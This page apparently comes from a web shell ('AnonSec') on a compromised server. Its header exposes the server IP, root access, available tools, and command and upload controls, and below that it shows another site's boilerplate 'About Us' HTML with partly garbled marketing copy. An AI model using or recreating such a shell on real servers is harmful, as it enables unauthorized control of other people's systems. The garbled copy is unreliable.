|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/joyfulnourishedandfree.com/../facilityconceptgroup.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>About Us - Facilityconceptgroup</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-white/90 backdrop-blur-lg shadow-md">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-3 group">
<div class="w-12 h-12 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center shadow-md group-hover:scale-110 transition-transform">
<span class="text-white font-bold text-xl">F</span>
</div>
<span class="self-center text-xl font-bold text-gray-900">
Facilityconceptgroup </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-gray-500 rounded-lg md:hidden hover:bg-gray-100">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-semibold flex flex-col md:flex-row md:space-x-6 items-center">
<li><a href="#services" class="block py-2 px-4 text-gray-700 hover:bg-indigo-50 hover:text-indigo-600 rounded-lg transition-all">Services</a></li>
<li><a href="#features" class="block py-2 px-4 text-gray-700 hover:bg-indigo-50 hover:text-indigo-600 rounded-lg transition-all">Features</a></li>
<li><a href="#about" class="block py-2 px-4 text-gray-700 hover:bg-indigo-50 hover:text-indigo-600 rounded-lg transition-all">About</a></li>
<li><a href="#testimonials" class="block py-2 px-4 text-gray-700 hover:bg-indigo-50 hover:text-indigo-600 rounded-lg transition-all">Testimonials</a></li>
<li>
<a href="#contact" class="block py-2.5 px-6 text-white bg-indigo-600 rounded-lg hover:bg-indigo-700 transition-all font-semibold shadow-md">
Get Started
</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="bg-white py-20" id="about">
<div class="max-w-screen-2xl mx-auto px-4">
<div class="text-center mb-16">
<h2 class="text-6xl font-black text-gray-900 mb-4">Drive Sustainable Growth with Our Expert eCommerce Solutions</h2>
<div class="w-32 h-2 bg-gradient-to-r from-indigo-600 to-violet-600 mx-auto mb-6"></div>
<p class="text-xl text-gray-600 max-w-3xl mx-auto">Experience the profound impact of as ecommerce experts, we know that understanding your target audience is key to driving sales and revenue. our digital marketing agency offers a range of solutions designed to help you connect with your target customers, from personalized email marketing campaigns to influencer partnerships and more. with our help, you can build lasting relationships with your customers and achieve long-term growth for your business. on your journey.</p>
</div>
<div class="grid md:grid-cols-3 gap-8 mb-12">
<div class="md:col-span-2">
<div class="relative h-[600px] rounded-3xl overflow-hidden">
<img src="https://images.unsplash.com/photo-Q1p7bh3SHj8?w=1200&h=800&fit=crop&auto=format&q=80" alt="About" class="w-full h-full object-cover">
<div class="absolute bottom-0 left-0 right-0 bg-gradient-to-t from-black/80 to-transparent p-8">
<span class="inline-block px-4 py-2 bg-white/20 backdrop-blur-sm text-white rounded-full text-sm font-semibold mb-4">
Performance Enhancers </span>
<h3 class="text-3xl font-bold text-white">Committed to Excellence</h3>
</div>
</div>
</div>
<div class="space-y-6">
<div class="bg-gradient-to-br from-gray-50 to-white p-8 rounded-2xl border border-gray-200 hover:shadow-xl transition-all">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-600 to-violet-600 rounded-xl flex items-center justify-center mb-4">
<i class="fas fa-trophy text-white text-xl"></i>
</div>
<h4 class="text-xl font-bold text-gray-900 mb-2">Award Winning</h4>
<p class="text-gray-600">Recognized globally</p>
</div>
<div class="bg-gradient-to-br from-gray-50 to-white p-8 rounded-2xl border border-gray-200 hover:shadow-xl transition-all">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-600 to-violet-600 rounded-xl flex items-center justify-center mb-4">
<i class="fas fa-users-cog text-white text-xl"></i>
</div>
<h4 class="text-xl font-bold text-gray-900 mb-2">Expert Team</h4>
<p class="text-gray-600">50+ professionals</p>
</div>
<div class="bg-gradient-to-br from-gray-50 to-white p-8 rounded-2xl border border-gray-200 hover:shadow-xl transition-all">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-600 to-violet-600 rounded-xl flex items-center justify-center mb-4">
<i class="fas fa-shield-check text-white text-xl"></i>
</div>
<h4 class="text-xl font-bold text-gray-900 mb-2">Certified</h4>
<p class="text-gray-600">ISO certified</p>
</div>
</div>
</div>
<div class="text-center">
<a href="#contact" class="inline-block px-12 py-6 bg-gray-900 text-white font-black text-lg rounded-full hover:bg-indigo-600 transition-all">
Find More Answers </a>
</div>
</div>
</section>
<section class="bg-gradient-to-r from-indigo-600 to-violet-600 py-24" id="features">
<div class="max-w-screen-xl mx-auto px-4">
<div class="text-center mb-20">
<h2 class="text-5xl md:text-6xl font-black text-white mb-6">Why Choose Us</h2>
<p class="text-xl text-white/90 max-w-3xl mx-auto">Premium features for exceptional results</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-8">
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-bolt text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Fast</h3>
<p class="text-gray-600">Lightning speed</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-lock text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Secure</h3>
<p class="text-gray-600">Bank-level security</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-mobile-alt text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Mobile</h3>
<p class="text-gray-600">All devices</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-sync text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Updated</h3>
<p class="text-gray-600">Always current</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-users text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Team</h3>
<p class="text-gray-600">Collaboration</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-chart-bar text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Analytics</h3>
<p class="text-gray-600">Deep insights</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-cloud text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Cloud</h3>
<p class="text-gray-600">Access anywhere</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-cog text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Custom</h3>
<p class="text-gray-600">Tailored</p>
</div>
</div>
</div>
</section>
<section class="bg-gray-50 py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-1">
<div class="bg-white p-10 text-center hover:shadow-xl transition-all group">
<div class="text-5xl font-black text-rose-600 mb-3 group-hover:scale-110 transition-transform">
18K+ </div>
<div class="text-gray-600 font-bold uppercase text-sm tracking-wider">
Customers </div>
</div>
<div class="bg-white p-10 text-center hover:shadow-xl transition-all group">
<div class="text-5xl font-black text-blue-600 mb-3 group-hover:scale-110 transition-transform">
250+ </div>
<div class="text-gray-600 font-bold uppercase text-sm tracking-wider">
Partners </div>
</div>
<div class="bg-white p-10 text-center hover:shadow-xl transition-all group">
<div class="text-5xl font-black text-green-600 mb-3 group-hover:scale-110 transition-transform">
99.9% </div>
<div class="text-gray-600 font-bold uppercase text-sm tracking-wider">
Uptime </div>
</div>
<div class="bg-white p-10 text-center hover:shadow-xl transition-all group">
<div class="text-5xl font-black text-purple-600 mb-3 group-hover:scale-110 transition-transform">
24/7 </div>
<div class="text-gray-600 font-bold uppercase text-sm tracking-wider">
Support </div>
</div>
</div>
</div>
</section>
<footer class="bg-white py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="flex flex-col md:flex-row justify-between items-start mb-12 gap-8">
<div class="flex-1">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-12 h-12 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center shadow-md">
<span class="text-white font-bold text-xl">F</span>
</div>
<span class="text-2xl font-black text-gray-900">Facilityconceptgroup</span>
</a>
<p class="text-gray-600 mb-6 max-w-sm">Building the future with innovative solutions and dedicated service.</p>
<div class="flex space-x-3">
<a href="#" class="w-10 h-10 bg-indigo-50 hover:bg-indigo-600 hover:text-white text-indigo-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-10 h-10 bg-indigo-50 hover:bg-indigo-600 hover:text-white text-indigo-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-10 h-10 bg-indigo-50 hover:bg-indigo-600 hover:text-white text-indigo-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-10 h-10 bg-indigo-50 hover:bg-indigo-600 hover:text-white text-indigo-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div class="grid grid-cols-2 md:grid-cols-4 gap-8 flex-1">
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Company</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="./about-us.php" class="hover:text-indigo-600 transition-colors text-sm">About</a></li>
<li><a href="#services" class="hover:text-indigo-600 transition-colors text-sm">Services</a></li>
<li><a href="./contact.php" class="hover:text-indigo-600 transition-colors text-sm">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Resources</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="blog/" class="hover:text-indigo-600 transition-colors text-sm">Blog</a></li>
<li><a href="#testimonials" class="hover:text-indigo-600 transition-colors text-sm">Testimonials</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Legal</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="./privacy.php" class="hover:text-indigo-600 transition-colors text-sm">Privacy</a></li>
<li><a href="./terms.php" class="hover:text-indigo-600 transition-colors text-sm">Terms</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Support</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="./contact.php" class="hover:text-indigo-600 transition-colors text-sm">Help Center</a></li>
<li><a href="./disclaimer.php" class="hover:text-indigo-600 transition-colors text-sm">Disclaimer</a></li>
</ul>
</div>
</div>
</div>
<div class="border-t border-gray-200 pt-8">
<p class="text-gray-500 text-sm text-center">© 2026 Facilityconceptgroup. All rights reserved.</p>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021